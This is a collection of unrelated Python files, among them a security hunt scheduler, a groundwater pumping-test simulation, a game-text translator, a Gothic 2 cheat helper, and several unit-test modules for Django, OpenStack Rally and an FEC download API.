self.execute_hunt(hunt)
continue
else:
# this one isn't ready so wait for this hunt to be ready
wait_time = (hunt.next_execution_time - local_time()).total_seconds()
logging.info(f"next hunt is {hunt} @ {hunt.next_execution_time} ({wait_time} seconds)")
self.wait_control_event.wait(wait_time)
self.wait_control_event.clear()
# if a hunt ends while we're waiting, wait_control_event will break out before wait_time seconds
# at this point, it's possible there's another hunt ready to execute before this one we're waiting on
# so no matter what, we break out so that we re-enter with a re-ordered list of hunts
return
def execute_hunt(self, hunt):
# are we ready to run another one of these types of hunts?
# NOTE this will BLOCK until a semaphore is ready OR this manager is shutting down
start_time = local_time()
hunt.semaphore = self.acquire_concurrency_lock()
if self.manager_control_event.is_set():
if hunt.semaphore is not None:
hunt.semaphore.release()
return
# keep track of how long it's taking to acquire the resource
if hunt.semaphore is not None:
self.record_semaphore_acquire_time(local_time() - start_time)
# start the execution of the hunt on a new thread
hunt_execution_thread = threading.Thread(target=self.execute_threaded_hunt,
args=(hunt,),
name=f"Hunt Execution {hunt}")
hunt_execution_thread.start()
# wait for the signal that the hunt has started
# this will block for a short time to ensure we don't wrap back around before the
# execution lock is acquired
hunt.startup_barrier.wait()
def execute_threaded_hunt(self, hunt):
try:
submissions = hunt.execute_with_lock()
if submissions:
hunt.apply_suppression()
except Exception as e:
logging.error(f"uncaught exception: {e}")
report_exception()
finally:
self.release_concurrency_lock(hunt.semaphore)
# at this point this hunt has finished and is eligible to execute again
self.wait_control_event.set()
if submissions is not None:
for submission in submissions:
self.collector.queue_submission(submission)
def cancel_hunts(self):
"""Cancels all the currently executing hunts."""
for hunt in self._hunts: # order doesn't matter here
try:
if hunt.running:
logging.info("cancelling {hunt}")
hunt.cancel()
hunt.wait()
except Exception as e:
logging.info("unable to cancel {hunt}: {e}")
def set_concurrency_limit(self, limit):
"""Sets the concurrency limit for this type of hunt.
If limit is a string then it's considered to be the name of a network semaphore.
If limit is an integer then a local threading.Semaphore is used."""
try:
# if the limit value is an integer then it's a local semaphore
self.concurrency_type = CONCURRENCY_TYPE_LOCAL_SEMAPHORE
self.concurrency_semaphore = threading.Semaphore(int(limit))
logging.debug(f"concurrency limit for {self.hunt_type} set to local limit {limit}")
except ValueError:
# otherwise it's the name of a network semaphore
self.concurrency_type = CONCURRENCY_TYPE_NETWORK_SEMAPHORE
self.concurrency_semaphore = limit
logging.debug(f"concurrency limit for {self.hunt_type} set to "
f"network semaphore {self.concurrency_semaphore}")
def acquire_concurrency_lock(self):
"""Acquires a concurrency lock for this type of hunt if specified in the configuration for the hunt.
Returns a NetworkSemaphoreClient object if the concurrency_type is CONCURRENCY_TYPE_NETWORK_SEMAPHORE
or a reference to the threading.Semaphore object if concurrency_type is CONCURRENCY_TYPE_LOCAL_SEMAPHORE.
Immediately returns None if non concurrency limits are in place for this type of hunt."""
if self.concurrency_type is None:
return None
result = None
start_time = local_time()
if self.concurrency_type == CONCURRENCY_TYPE_NETWORK_SEMAPHORE:
logging.debug(f"acquiring network concurrency semaphore {self.concurrency_semaphore} "
f"for hunt type {self.hunt_type}")
result = NetworkSemaphoreClient(cancel_request_callback=self.manager_control_event.is_set)
# make sure we cancel outstanding request
# when shutting down
result.acquire(self.concurrency_semaphore)
else:
logging.debug(f"acquiring local concurrency semaphore for hunt type {self.hunt_type}")
while not self.manager_control_event.is_set():
if self.concurrency_semaphore.acquire(blocking=True, timeout=0.1):
result = self.concurrency_semaphore
break
if result is not None:
total_seconds = (local_time() - start_time).total_seconds()
logging.debug(f"acquired concurrency semaphore for hunt type {self.hunt_type} in {total_seconds} seconds")
return result
def release_concurrency_lock(self, semaphore):
if semaphore is not None:
# both types of semaphores support this function call
logging.debug(f"releasing concurrency semaphore for hunt type {self.hunt_type}")
semaphore.release()
def load_hunts_from_config(self, hunt_filter=lambda hunt: True):
"""Loads the hunts from the configuration settings.
Returns True if all of the hunts were loaded correctly, False if any errors occurred.
The hunt_filter paramter defines an optional lambda function that takes the Hunt object
after it is loaded and returns True if the Hunt should be added, False otherwise.
This is useful for unit testing."""
for hunt_config in self._list_hunt_ini():
hunt = self.hunt_cls(manager=self)
logging.debug(f"loading hunt from {hunt_config}")
try:
hunt.load_from_ini(hunt_config)
if hunt_filter(hunt):
logging.debug(f"loaded {hunt} from {hunt_config}")
self.add_hunt(hunt)
else:
logging.debug(f"not loading {hunt} (hunt_filter returned False)")
except InvalidHuntTypeError as e:
self.skipped_ini_files.add(hunt_config)
logging.debug(f"skipping {hunt_config} for {self}: {e}")
continue
except Exception as e:
logging.error(f"unable to load hunt {hunt}: {e}")
report_exception()
try:
self.failed_ini_files[hunt_config] = os.path.getmtime(hunt_config)
except Exception as e:
logging.error(f"unable to get mtime for {hunt_config}: {e}")
# remember that we loaded the hunts from the configuration file
# this is used when we receive the signal to reload the hunts
self.hunts_loaded_from_config = True
def add_hunt(self, hunt):
assert isinstance(hunt, Hunt)
if hunt.type != self.hunt_type:
raise ValueError(f"hunt {hunt} has wrong type for {self.hunt_type}")
with self.hunt_lock:
# make sure this hunt doesn't already exist
for _hunt in self._hunts:
if _hunt.name == hunt.name:
raise KeyError(f"duplicate hunt {hunt.name}")
with open_hunt_db(self.hunt_type) as db:
c = db.cursor()
c.execute("INSERT OR IGNORE INTO hunt(hunt_name) VALUES ( ? )",
(hunt.name,))
db.commit()
self._hunts.append(hunt)
self.wait_control_event.set()
return hunt
def clear_hunts(self):
"""Removes all hunts."""
with self.hunt_lock:
with open_hunt_db(self.hunt_type) as db:
c = db.cursor()
c.execute("DELETE FROM hunt")
db.commit()
self._hunts = []
self.failed_ini_files = {}
self.skipped_ini_files = set()
self.wait_control_event.set()
def remove_hunt(self, hunt):
assert isinstance(hunt, Hunt)
with self.hunt_lock:
with open_hunt_db(hunt.type) as db:
c = db.cursor()
c.execute("DELETE FROM hunt WHERE hunt_name = ?",
(hunt.name,))
db.commit()
self._hunts.remove(hunt)
self.wait_control_event.set()
return hunt
def _list_hunt_ini(self):
"""Returns the list of ini files for hunts in self.rule_dirs."""
result = []
for rule_dir in self.rule_dirs:
rule_dir = abs_path(rule_dir)
if not os.path.isdir(rule_dir):
logging.error(f"rules directory {rule_dir} specified for {self} is not a directory")
continue
# load each .ini file found in this rules directory
logging.debug(f"searching {rule_dir} for hunt configurations")
for root, dirnames, filenames in os.walk(rule_dir):
for hunt_config in filenames:
if not hunt_config.endswith('.ini'):
continue
result.append(os.path.join(root, hunt_config))
return result
def record_semaphore_acquire_time(self, time_delta):
pass
class HunterCollector(Collector):
"""Manages and executes the hunts configured for the system."""
def __init__(self, *args, **kwargs):
super().__init__(service_config=saq.CONFIG['service_hunter'],
workload_type='hunter',
delete_files=True,
*args, **kwargs)
# each type of hunt is grouped and managed as a single unit
self.hunt_managers = {} # key = hunt_type, value = HuntManager
def reload_service(self, *args, **kwargs):
# pass along the SIGHUP to the hunt managers
super().reload_service(*args, **kwargs)
for manager in self.hunt_managers.values():
manager.signal_reload()
def debug_extended_collection(self):
self.extended_collection()
def load_hunt_managers(self):
"""Loads all configured hunt managers."""
for section_name in saq.CONFIG.sections():
if not section_name.startswith('hunt_type_'):
continue
section = saq.CONFIG[section_name]
if 'rule_dirs' not in section:
logging.error(f"config section {section} does not define rule_dirs")
continue
hunt_type = section_name[len('hunt_type_'):]
# make sure the class definition for this hunt is valid
module_name = section['module']
try:
_module = importlib.import_module(module_name)
except Exception as e:
logging.error(f"unable to import hunt module {module_name}: {e}")
continue
class_name = section['class']
try:
class_definition = getattr(_module, class_name)
except AttributeError as e:
logging.error("class {} does not exist in module {} in hunt {} config".format(
class_name, module_name, section))
continue
logging.debug(f"loading hunt manager for {hunt_type} class {class_definition}")
self.hunt_managers[hunt_type] = \
HuntManager(collector=self,
hunt_type=hunt_type,
rule_dirs=[_.strip() for _ in section['rule_dirs'].split(',')],
hunt_cls=class_definition,
concurrency_limit=section.get('concurrency_limit', fallback=None),
persistence_dir=self.persistence_dir,
update_frequency=self.service_config.getint('update_frequency'),
config = section)
def extended_collection(self):
# load each type of hunt from the configuration settings
self.load_hunt_managers()
logging.info("starting hunt managers...")
for manager in self.hunt_managers.values():
if self.service_is_debug:
manager.debug()
else:
manager.start()
if self.service_is_debug:
return
# wait for this service the end
self.service_shutdown_event.wait()
# then stop the managers and wait for them to complete
for manager in self.hunt_managers.values():
manager.stop()
# then wait for the managers to complete
for manager in self.hunt_managers.values():
manager.wait()
|
# -*- coding: utf-8 -*-
import numpy as np
import welltestpy as wtp
import seaborn as sns
import pandas as pd
from anaflow import thiem
from ogs5py import specialrange
from matplotlib import pyplot as plt
#from gstools import SRF, Gaussian
from project import get_srf, ogs_2d, priors
from scipy.optimize import curve_fit
from pathlib import Path
# discretization and parameters
time = specialrange(0, 7200, 50, typ="cub")
rad = specialrange(0, 1000, 100, typ="cub")
angles = 32
#storage = 1e-3
T_const = 1e-5
rate = -1e-3
well_pos = rad[[0, 6, 11, 16, 21, 31, 41, 51, 61, 71, 81]]
pwell_pos = np.array([well_pos[0], 0.0])
owell_pos = well_pos[1:]
def run_ogs_project(model):
model.write_input()
success = model.run_model()
return success
def import_ogs_results(model, owell_name = "owell"):
point = model.readtec_point(pcs="GROUNDWATER_FLOW")
time = point[owell_name]["TIME"]
head = point[owell_name]["HEAD"]
return head, time
def campaign(model, T_field, owell_pos, pwell_pos, campaign_id = 1):
owell_pos = np.array(owell_pos)
field = wtp.FieldSite(name="Pump test data worth", coordinates=[0.0, 0.0])
campaign = wtp.Campaign(name="Transient-multi_" + str(campaign_id),
fieldsite = field)
campaign.add_well(name="pwell", radius=0.1, coordinates=(pwell_pos[0][0],
pwell_pos[0][1]))
campaign.add_well(name="owell_0", radius=0.1, coordinates=(owell_pos[0][0],
owell_pos[0][1]))
campaign.add_well(name="owell_1", radius=0.1, coordinates=(owell_pos[1][0],
owell_pos[1][1]))
campaign.add_well(name="owell_2", radius=0.1, coordinates=(owell_pos[2][0],
owell_pos[2][1]))
campaign.add_well(name="owell_3", radius=0.1, coordinates=(owell_pos[3][0],
owell_pos[3][1]))
campaign.add_well(name="owell_4", radius=0.1, coordinates=(owell_pos[4][0],
owell_pos[4][1]))
campaign.add_well(name="owell_5", radius=0.1, coordinates=(owell_pos[5][0],
owell_pos[5][1]))
campaign.add_well(name="owell_6", radius=0.1, coordinates=(owell_pos[6][0],
owell_pos[6][1]))
campaign.add_well(name="owell_7", radius=0.1, coordinates=(owell_pos[7][0],
owell_pos[7][1]))
campaign.add_well(name="owell_8", radius=0.1, coordinates=(owell_pos[8][0],
owell_pos[8][1]))
model = ogs_2d.write_ogs_project(model, owell_pos, T_field, time=time)
succes = run_ogs_project(model)
head_0, time_0 = import_ogs_results(model, owell_name = "owell_0")
head_1, time_1 = import_ogs_results(model, owell_name = "owell_1")
head_2, time_2 = import_ogs_results(model, owell_name = "owell_2")
head_3, time_3 = import_ogs_results(model, owell_name = "owell_3")
head_4, time_4 = import_ogs_results(model, owell_name = "owell_4")
head_5, time_5 = import_ogs_results(model, owell_name = "owell_5")
head_6, time_6 = import_ogs_results(model, owell_name = "owell_6")
head_7, time_7 = import_ogs_results(model, owell_name = "owell_7")
head_8, time_8 = import_ogs_results(model, owell_name = "owell_8")
pumptest = wtp.PumpingTest(
name="pwell",
pumpingwell="pwell",
pumpingrate=rate,
description="Virtual transient 2d pumping test",
)
pumptest.add_transient_obs("owell_0", time_0, head_0)
pumptest.add_transient_obs("owell_1", time_1, head_1)
pumptest.add_transient_obs("owell_2", time_2, head_2)
pumptest.add_transient_obs("owell_3", time_3, head_3)
pumptest.add_transient_obs("owell_4", time_4, head_4)
pumptest.add_transient_obs("owell_5", time_5, head_5)
pumptest.add_transient_obs("owell_6", time_6, head_6)
pumptest.add_transient_obs("owell_7", time_7, head_7)
pumptest.add_transient_obs("owell_8", time_8, head_8)
campaign.addtests(pumptest)
campaign.save(path = "../data/")
if __name__ == '__main__':
model = ogs_2d.init_ogs_project(rad, task_root="pump_2d_trans_multi")
T_field = get_srf.get_srf_2d(model,
mean = -5, var = 1.1, len_scale = 100, seed = 1)
pwell_pos = [[0, 0]]
owell_pos = [[1, 0], [3, 2], [5, 2], [0, -10], [-30, 0],
[0, 50], [100, 0], [0, -250], [-500, 0]]
campaign(model, T_field, owell_pos, pwell_pos, campaign_id = 1)
pwell_pos = [[1, 0]]
owell_pos = [[0, 0], [3, 2], [5, 2], [0, -10], [-30, 0],
[0, 50], [100, 0], [0, -250], [-500, 0]]
campaign(model, T_field, owell_pos, pwell_pos, campaign_id = 2)
pwell_pos = [[3, 2]]
owell_pos = [[1, 0], [0, 0], [5, 2], [0, -10], [-30, 0],
[0, 50], [100, 0], [0, -250], [-500, 0]]
campaign(model, T_field, owell_pos, pwell_pos, campaign_id = 3)
pwell_pos = [[5, 2]]
owell_pos = [[1, 0], [3, 2], [0, 0], [0, -10], [-30, 0],
[0, 50], [100, 0], [0, -250], [-500, 0]]
campaign(model, T_field, owell_pos, pwell_pos, campaign_id = 4)
# print(head_0)
|
'''Dark Souls 3 msg XML processor'''
# pylint: disable=E1101,E1136,E1137,C0111,C0103
import asyncio
import codecs
import random
import re
import time
from dataclasses import dataclass, field
from functools import partial, reduce, wraps
from pathlib import Path
from typing import Dict
from xml.etree import ElementTree
import paco
from . import data
from .translator import Translator
def wrapasync(func):
@wraps(func)
async def run(*args, loop=None, executor=None, **kwargs):
if loop is None:
loop = asyncio.get_event_loop()
pfunc = partial(func, *args, **kwargs)
return await loop.run_in_executor(executor, pfunc)
return run
def replacenth(string, sub, wanted, n):
where = [m.start() for m in re.finditer(sub, string)][n-1]
before = string[:where]
after = string[where:]
after = after.replace(sub, wanted, 1)
return before + after
@dataclass
class Processor:
linecount: int = 0
charcount: int = 0
cachcount: int = 0
collcount: int = 0
textcache: Dict[str, str] = field(default_factory=dict)
rand: random.Random = random.Random()
def reset(self):
self.linecount = 0
self.charcount = 0
self.cachcount = 0
self.collcount = 0
self.textcache = {}
@staticmethod
def getentries(path: Path) -> (ElementTree, ElementTree):
'''Get all entries from a msg xml'''
# exclude certain paths
skip = False
for e in data.ignorefiles_prefix:
if path.name.startswith(e):
skip = True
break
if skip:
return None, None
xml = ElementTree.parse(path)
root = xml.getroot()
if not root or root.tag != 'fmg':
print('invalid fmg xml! no fmg root in', path)
return None, None
entries = root.find('entries')
if not entries:
print('invalid fmg xml! no entries in', path)
return None, None
for entry in entries:
if not entry.text:
entry.text = ' '
# exclude certain texts
return (xml, list(filter(
lambda entry: \
entry.text not in data.ignoretext and \
not any(filter(lambda infix: infix in entry.text, data.ignoretext_infix)),
entries)))
@staticmethod
def savexml(xml: ElementTree, path: Path):
'''Save xml in the correct format'''
print()
print('writing ', path.relative_to(data.basepath))
xml.write(path, encoding='utf-8', xml_declaration=False)
# prepend bom and correct decl
with codecs.open(path, 'r', 'utf-8') as original:
ogdata = original.read()
with codecs.open(path, 'w', 'utf-8-sig') as modified:
modified.write('<?xml version="1.0" encoding="utf-8"?>\n' + ogdata)
@wrapasync
def __translate_entry(self, entry: ElementTree) -> int:
text = entry.text
# check if translation is already cached
if text in self.textcache.keys():
entry.text = self.textcache[text]
print('#', sep='', end='', flush=True)
return -1
# send text for translation
t = Translator(text, self.rand)
t.run(data.translate_steps)
# reorder into separate lines
original_text_lines = text.splitlines()
original_break = 0
for line in original_text_lines:
if line == '':
break
lsp = line.split('. ')
if not lsp:
if line[-1:] == '.':
original_break += 1
else:
original_break += len(lsp)
else:
original_break = 0
if len(original_text_lines) > 2:
res = '\n'.join(map(lambda r: r[:1].upper() + r[1:],\
t.string.replace('. ', '.\n', len(original_text_lines) - 1).splitlines()))
if original_break and res.count('\n') >= original_break:
res = replacenth(res, '\n', '\n\n', original_break)
if original_break > 1:
res = res.replace('.\n', '. ', 1)
# elif len(original_text_lines) > 1:
# res = t.string.replace('. ', '.\n', 1).replace('\n\n', '\n')
else:
res = t.string
# check if translation is already cached
# in case same text was sent for translation simultaniously
if text in self.textcache.keys():
entry.text = self.textcache[text]
print('!', sep='', end='', flush=True)
return -2
# store results
entry.text = res
self.textcache[text] = res
print('.', sep='', end='', flush=True)
return len(text)
async def translate(self, path: Path):
xml, entries = self.getentries(path)
if not xml:
print('skipping', path.relative_to(data.basepath))
return
if not entries:
print('skipping', path.relative_to(data.basepath))
self.savexml(xml, path)
return
print('processing', path.relative_to(data.basepath), 'with', len(entries), 'entries')
starttime = time.time()
# shuffle because often the same entry appears multiple time in a row
# and we want to minimize concurrency collisions
entries_shuffled = list(entries)
random.shuffle(entries_shuffled)
results = await paco.map(self.__translate_entry, entries_shuffled, limit=32)
linecount = reduce(lambda a, v: a+1, filter(lambda v: v > 0, results), 0)
charcount = reduce(lambda a, v: a+v, filter(lambda v: v > 0, results), 0)
cachcount = reduce(lambda a, v: a+1, filter(lambda v: v == -1, results), 0)
collcount = reduce(lambda a, v: a+1, filter(lambda v: v == -2, results), 0)
self.linecount += linecount
self.charcount += charcount
self.cachcount += cachcount
self.collcount += collcount
self.savexml(xml, path)
endtime = time.time()
print('processed %d lines with %d chars in %.3f seconds (%d cached, %d collisions)' %\
(linecount, charcount, endtime - starttime, cachcount, collcount))
print()
def count(self, path: Path):
_, entries = self.getentries(path)
if not entries:
# print('\tskipping', path)
return
# print('\tcounting', path)
# starttime = time.time()
linecount = 0
charcount = 0
cachcount = 0
for entry in entries:
text = entry.text
if not text in self.textcache.keys():
self.textcache[text] = 'c'
linecount += 1
charcount += len(text)
else:
cachcount += 1
self.linecount += linecount
self.charcount += charcount
self.cachcount += cachcount
# endtime = time.time()
# print('\tcounted %d unique lines with %d chars in %.3f seconds (%d cached)' %\
# (linecount, charcount, endtime - starttime, cachcount))
|
# The MIT License (MIT)
#
# Copyright (c) 2017 Paul Sokolovsky
# Modified by Brent Rubell for Adafruit Industries, 2019
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""
`adafruit_hashlib`
================================================================================
Secure hashes and message digests
* Author(s): Paul Sokolovsky, Brent Rubell
Implementation Notes
--------------------
**Hardware:**
**Software and Dependencies:**
* Adafruit CircuitPython firmware for the supported boards:
https://github.com/adafruit/circuitpython/releases
"""
try:
import hashlib
except ImportError:
from adafruit_hashlib._sha256 import sha224, sha256
from adafruit_hashlib._sha512 import sha384, sha512
from adafruit_hashlib._sha1 import sha1
from adafruit_hashlib._md5 import md5
__version__ = "0.0.0-auto.0"
__repo__ = "https://github.com/adafruit/Adafruit_CircuitPython_hashlib.git"
# FIPS secure hash algorithms supported by this library
ALGOS_AVAIL = ["sha1", "md5", "sha224", "sha256", "sha384", "sha512"]
def new(algo, data=b""):
"""Creates a new hashlib object.
:param str algo: Name of the desired algorithm.
:param str data: First parameter.
"""
try:
hash_object = globals()[algo]
return hash_object(data)
except KeyError:
raise ValueError(algo)
@property
def algorithms_available():
"""Returns a list containing the names of the hash
algorithms that are available in this module.
"""
return ALGOS_AVAIL
|
from django.test import TestCase
from django.contrib.auth.models import User
from datetime import datetime
from .models import Task, Project
# Create your tests here.
def create_test_user():
return User.objects.create_user(username='User', email='mail@example.com', password='password')
class TestModels(TestCase):
def setUp(self):
self.user = create_test_user()
self.project = Project.objects.create(name='Project #1', user=self.user)
self.object = Task.objects.create(content='Task #1', deadline=datetime.now(), project=self.project)
def test_task_str(self):
self.assertEqual(self.object.__str__(), 'Task #1')
def test_project_str(self):
self.assertEqual(self.project.__str__(), 'Project #1')
class TestAngularView(TestCase):
def setUp(self):
self.user = create_test_user()
self.client.login(username='User', password='password')
def test_page_accessible(self):
response = self.client.get('/')
self.assertEqual(response.status_code, 200)
class TestAPI(TestCase):
def setUp(self):
self.user = create_test_user()
self.client.login(username='User', password='password')
def test_task_view(self):
response = self.client.get('/api/tasks/')
self.assertEqual(response.status_code, 200)
def test_receive_only_for_current_user(self):
user2 = User.objects.create_user(username='user2', password='password')
project = Project.objects.create(name='project 2', user=user2)
Task.objects.create(content='task 1', project=project)
project2 = Project.objects.create(name='project 1', user=self.user)
Task.objects.create(content='task 4', project=project2)
response = self.client.get('/api/projects/')
self.assertContains(response, 'project 1')
self.assertNotContains(response, 'project 2')
def test_unauthorized(self):
self.client.logout()
response = self.client.get('/api/projects/')
self.assertEqual(response.status_code, 403)
def test_create_project_assign_user(self):
response = self.client.post('/api/projects/', {'name': 'Project 1'})
project = Project.objects.first()
#self.assertEqual(project.user, self.user)
|
from .constants import Constants
from donation_play.games.common_cheater import CommonCheater
class Gothic2Cheater(Constants, CommonCheater):
"""Class for working with Gothic cheats."""
def __init__(self, gothic_title, mem_editor=None):
"""Class initialization.
:param str gothic_title: game title.
:param memory_editor.MemoryEditor mem_editor: instance of MemCheater.
"""
super().__init__(gothic_title)
self.mem_editor = mem_editor
def call_cheat(self, cheat_code):
"""Call cheat code to game console.
:param str cheat_code: cheat code.
"""
if not self.marvin_mode:
self.marvin_mode = True
code = "{console}{code}{code_end}{console}".format(console=self.CONSOLE_KEY, code=cheat_code,
code_end=self.ENTER_CHEAT_KEY)
self.send_cheat_code(cheat_code=code)
self.marvin_mode = False
def call_b_cheat(self, cheat_code):
"""Call B cheat code to game menu.
:param str cheat_code: cheat code.
"""
code = "{activator}{code}{activator}".format(activator=self.B_CHEATS, code=cheat_code)
self.send_cheat_code(cheat_code=code)
def cancel_b_cheats(self):
"""Cancel effect of B cheats."""
code = "{activator}{code}{activator}".format(activator=self.B_CHEATS, code=self.CANCEL_B_CHEATS)
self.send_cheat_code(cheat_code=code)
def spawn(self, npc_code):
"""Spawn NPC by code.
:param npc_code: NPCs code.
"""
cheat_code = "i{npc_code}".format(npc_code=npc_code)
self.call_cheat(cheat_code=cheat_code)
def heal(self):
"""Heal hero."""
cheat_code = "chf"
self.call_cheat(cheat_code=cheat_code)
def teleport(self, waypoint_code):
"""Teleport hero to waypoint.
:param waypoint_code: waypoint code
"""
cheat_code = "gw{waypoint_code}".format(waypoint_code=waypoint_code)
self.call_cheat(cheat_code=cheat_code)
def set_hour(self, hour):
"""Set in-game hours.
:param hour: 24-h format of hours.
"""
cheat_code = "seti{hour}".format(hour=hour)
self.call_cheat(cheat_code=cheat_code)
def set_2d_characters(self):
"""Set characters to 2D."""
cheat_code = "GROMMIT"
self.call_b_cheat(cheat_code=cheat_code)
def set_characters_fat(self):
"""Set characters fat."""
cheat_code = "GARFIELD"
self.call_b_cheat(cheat_code=cheat_code)
def set_speed_hack(self):
"""Enable speed hack."""
cheat_code = "SOUTHPARK"
self.call_b_cheat(cheat_code=cheat_code)
@property
def skill_points(self):
"""Hero's skill points."""
return self.mem_editor.get_value_from_pointer(*self.SKILL_POINTS_POINTER)
@skill_points.setter
def skill_points(self, value):
self.mem_editor.put_value_into_pointer(value, *self.SKILL_POINTS_POINTER)
@property
def strength(self):
"""Hero's strength."""
return self.mem_editor.get_value_from_pointer(*self.STRENGTH_POINTER)
@strength.setter
def strength(self, value):
self.mem_editor.put_value_into_pointer(value, *self.STRENGTH_POINTER)
@property
def agility(self):
"""Hero's agility."""
return self.mem_editor.get_value_from_pointer(*self.AGILITY_POINTER)
@agility.setter
def agility(self, value):
self.mem_editor.put_value_into_pointer(value, *self.AGILITY_POINTER)
@property
def marvin_mode(self):
"""Cheat mode - MARVIN mode."""
value = self.mem_editor.get_value_from_pointer(*self.MARVIN_POINTER)
return value == 1
@marvin_mode.setter
def marvin_mode(self, value):
self.mem_editor.put_value_into_pointer(value, *self.MARVIN_POINTER)
|
#!/usr/bin/env python
import os
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
def read(*paths):
"""Build a file path from *paths* and return the contents."""
with open(os.path.join(*paths), 'r') as f:
return f.read()
install_requires = []
# install_requires = ['requests >= 2.1.0']
# For SNI support in Python 2, must install the following packages
# if sys.version_info[0] == 2:
# install_requires.append('pyOpenSSL >= 0.14')
# install_requires.append('ndg-httpsclient >= 0.3.3')
# install_requires.append('pyasn1 >= 0.1.7')
setup(
name='mymodule',
packages=['mymodule'],
version='0.1',
description='Desc',
long_description=(read('README.rst') + '\n\n' +
read('HISTORY.rst') + '\n\n' +
read('AUTHORS.rst')),
url='http://github.com/rgooler/bootstrap-pip/',
license='MIT',
author='Ryan Gooler',
author_email='ryan.gooler@gmail.com',
py_modules=['mymodule'],
install_requires=install_requires,
include_package_data=True,
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Natural Language :: English',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Topic :: Software Development :: Libraries :: Python Modules',
],
)
|
# Copyright 2018 Red Hat Inc
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from rally_openstack.scenarios.barbican import containers
from tests.unit import test
class BarbicanContainersTestCase(test.ScenarioTestCase):
def get_test_context(self):
context = super(BarbicanContainersTestCase, self).get_test_context()
context.update({
"admin": {
"user_id": "fake",
"credential": mock.MagicMock()
},
"user": {
"user_id": "fake",
"credential": mock.MagicMock()
},
"tenant": {"id": "fake"}
})
return context
def setUp(self):
super(BarbicanContainersTestCase, self).setUp()
patch = mock.patch(
"rally_openstack.services.key_manager.barbican.BarbicanService")
self.addCleanup(patch.stop)
self.mock_secrets = patch.start()
def test_list_containers(self):
secrets_service = self.mock_secrets.return_value
scenario = containers.BarbicanContainersList(self.context)
scenario.run()
secrets_service.list_container.assert_called_once_with()
def test_generic_container_create_and_delete(self):
secrets_service = self.mock_secrets.return_value
fake_container = {"container_ref": "fake_container_ref"}
fake_container = secrets_service.container_create.return_value
scenario = containers.BarbicanContainersGenericCreateAndDelete(
self.context)
scenario.run()
secrets_service.container_create.assert_called_once_with()
secrets_service.container_delete.assert_called_once_with(
fake_container.container_ref)
def test_generic_container_create_and_add_secret(self):
secrets_service = self.mock_secrets.return_value
fake_container = {"container_ref": "fake_container_ref"}
fake_secrets = {"secret_ref": "fake_secret_ref"}
fake_container = secrets_service.container_create.return_value
fake_secrets = secrets_service.create_secret.return_value
scenario = containers.BarbicanContainersGenericCreateAndAddSecret(
self.context)
scenario.run()
secrets_service.create_secret.assert_called_once_with()
secrets_service.container_create.assert_called_once_with(
secrets={"secret": fake_secrets})
secrets_service.container_delete.assert_called_once_with(
fake_container.container_ref)
def test_certificate_coentaineri_create_and_delete(self):
secrets_service = self.mock_secrets.return_value
fake_container = {"container_ref": "fake_container_ref"}
fake_container = secrets_service.create_certificate_container \
.return_value
scenario = containers.BarbicanContainersCertificateCreateAndDelete(
self.context)
scenario.run()
secrets_service.create_certificate_container.assert_called_once_with()
secrets_service.container_delete.assert_called_once_with(
fake_container.container_ref)
def test_rsa_container_create_and_delete(self):
secrets_service = self.mock_secrets.return_value
fake_container = {"container_ref": "fake_container_ref"}
fake_container = secrets_service.create_rsa_container.return_value
scenario = containers.BarbicanContainersRSACreateAndDelete(
self.context)
scenario.run()
secrets_service.create_rsa_container.assert_called_once_with()
secrets_service.container_delete.assert_called_once_with(
fake_container.container_ref)
|
"""
Module containing common generator constants
"""
LOGGER_NAME = "logger"
|
from rjgtoys.yaml import yaml_load
data = yaml_load("""
---
a: 1
b: 2
""")
print(data)
|
import mock
import hashlib
import pytest
from botocore.exceptions import ClientError
from webservices.rest import db, api
from webservices.tasks import download as tasks
from webservices.resources import download as resource
from tests import factories
from tests.common import ApiBaseTest
class TestDownloadTask(ApiBaseTest):
def test_get_filename(self):
path = '/v1/candidates/'
qs = '?office=H&sort=name'
expected = hashlib.sha224((path + qs).encode('utf-8')).hexdigest() + '.zip'
assert tasks.get_s3_name(path, qs) == expected
def test_download_url(self):
obj = mock.Mock()
obj.key = 'key'
obj.bucket = 'bucket'
obj.meta.client.generate_presigned_url.return_value = '/download'
url = resource.get_download_url(obj)
assert url == '/download'
assert obj.meta.client.generate_presigned_url.called_once_with(
'get_object',
Params={'Key': 'key', 'Bucket': 'bucket'},
ExpiresIn=resource.URL_EXPIRY,
)
def test_download_url_filename(self):
obj = mock.Mock()
obj.key = 'key'
obj.bucket = 'bucket'
resource.get_download_url(obj, filename='data.zip')
assert obj.meta.client.generate_presigned_url.called_once_with(
'get_object',
Params={
'Key': 'key',
'Bucket': 'bucket',
'ResponseContentDisposition': 'filename=data.zip',
},
ExpiresIn=resource.URL_EXPIRY,
)
@mock.patch('webservices.tasks.download.upload_s3')
def test_views(self, upload_s3):
for view in tasks.RESOURCE_WHITELIST:
url = api.url_for(view)
tasks.export_query(url, b'')
class TestDownloadResource(ApiBaseTest):
